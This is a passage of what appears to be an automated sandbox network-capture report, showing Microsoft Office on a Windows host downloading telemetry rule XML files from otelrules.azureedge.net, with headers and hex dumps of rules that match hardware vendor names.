                                                                                                                    2024-11-25 18:53:11 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    22192.168.2.44981013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:11 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:11 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:11 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 450
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                    ETag: "0x8DC582BD4C869AE"
                                                                                                                    x-ms-request-id: ac6669be-e01e-003c-668c-3ac70b000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185311Z-174c587ffdf6b487hC1TEBydsn000000066000000000rhug
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:11 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    23192.168.2.44981313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:11 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:11 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:11 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 2160
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                    ETag: "0x8DC582BA3B95D81"
                                                                                                                    x-ms-request-id: 12c25404-a01e-0070-5667-3d573b000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185311Z-15b8b599d886w4hzhC1TEBb4ug00000006a000000000n20t
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:11 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    24192.168.2.44981213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:11 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:11 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:11 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 408
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                    ETag: "0x8DC582BB56D3AFB"
                                                                                                                    x-ms-request-id: a3d07856-b01e-0084-3a7e-3bd736000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185311Z-174c587ffdf8lw6dhC1TEBkgs8000000069g00000000mp1w
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:11 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    25192.168.2.44980913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:11 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:11 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:11 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 3788
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                    ETag: "0x8DC582BAC2126A6"
                                                                                                                    x-ms-request-id: 5299024a-c01e-0079-4d47-3ce51a000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185311Z-174c587ffdf9xbcchC1TEBxkz4000000064000000000nz3t
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:11 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    26192.168.2.44981413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:13 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:13 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:13 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 474
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                    ETag: "0x8DC582B9964B277"
                                                                                                                    x-ms-request-id: 614243f2-101e-000b-1164-3d5e5c000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185313Z-178bfbc474bwh9gmhC1NYCy3rs00000007w000000000nkpb
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:13 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    27192.168.2.44981713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:13 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:14 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:13 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 632
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                    ETag: "0x8DC582BB6E3779E"
                                                                                                                    x-ms-request-id: 5e8702c1-301e-000c-0b8f-3b323f000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185313Z-174c587ffdf8lw6dhC1TEBkgs8000000067g00000000u39k
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:14 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    28192.168.2.44981513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:13 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:14 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:14 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 415
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                    ETag: "0x8DC582B9F6F3512"
                                                                                                                    x-ms-request-id: a6bfa609-001e-00a2-4d66-3bd4d5000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185313Z-178bfbc474btrnf9hC1NYCb80g00000007x000000000vg5t
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:14 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    29192.168.2.44981813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:13 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:14 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:13 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 467
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                    ETag: "0x8DC582BA6C038BC"
                                                                                                                    x-ms-request-id: 6e49b968-201e-006e-4441-3ebbe3000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185313Z-174c587ffdftjz9shC1TEBsh980000000690000000002f31
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:14 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    30192.168.2.44981613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:13 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:14 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:13 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 471
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                    ETag: "0x8DC582BB10C598B"
                                                                                                                    x-ms-request-id: ce5ebd39-a01e-0053-183c-3c8603000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185313Z-15b8b599d88hd9g7hC1TEBp75c000000068000000000hub1
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:14 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    31192.168.2.44982013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:15 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:16 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:16 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 407
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                    ETag: "0x8DC582BBAD04B7B"
                                                                                                                    x-ms-request-id: c38a0343-101e-008e-38bf-3ecf88000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185316Z-178bfbc474bv7whqhC1NYC1fg400000007tg00000000pum1
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:16 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
